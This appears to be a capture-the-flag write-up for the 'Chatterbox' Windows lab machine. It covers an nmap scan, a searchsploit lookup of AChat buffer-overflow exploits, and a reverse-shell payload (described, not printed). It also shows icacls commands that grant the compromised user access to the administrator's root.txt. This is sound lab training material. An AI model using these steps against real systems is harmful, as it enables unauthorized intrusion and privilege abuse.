Chatterbox
OS: Windows, Difficulty: Medium, IP: 10.10.10.74
Initial Enumeration
# Nmap 7.70 scan initiated Mon Jul 29 17:20:46 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 9255,9256 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.40s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 9256/tcp)
HOP RTT ADDRESS
1 402.86 ms 10.10.14.1
2 404.26 ms 10.10.10.74
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 29 17:21:25 2019 -- 1 IP address (1 host up) scanned in 42.58 seconds
Searchsploit for achat
$ searchsploit achat
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Metasploit wasn't working for me so I moved to the manual exploitation script, which launched calculator, however, I changed the shellcode to launch a windows/shell_reverse_tcp
shell for my kali machine.
User Own
C:\Users\Alfred\Desktop>type user.txt
type user.txt
72290***
Root Own
On a little inspection it turns out, I can look at the Administrator folder, however, can not read the root.txt file from it. This seemed very odd.
Directory of C:\Users\Administrator\Desktop
12/10/2017 07:50 PM <DIR> .
12/10/2017 07:50 PM <DIR> ..
12/10/2017 07:50 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,162,642,944 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
I checked the permissions I have on the Desktop folder as well as on the root.txt file, it turns out I have FULL control of the file and the folder, all I had to do was grant myself the permission to read the root.txt file.
C:\Users\Administrator>icacls Desktop
icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
C:\Users\Administrator\Desktop>icacls "root.txt" /grant "Alfred":F
icacls "root.txt" /grant "Alfred":F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
C:\Users\Administrator\Desktop>type root.txt
type root.txt
a673d***
Learning Outcome
Have a look at all the important files first and then determine your strategy, I wasted quite a while without realising that I had FULL access on the required folder.
Last updated
Was this helpful?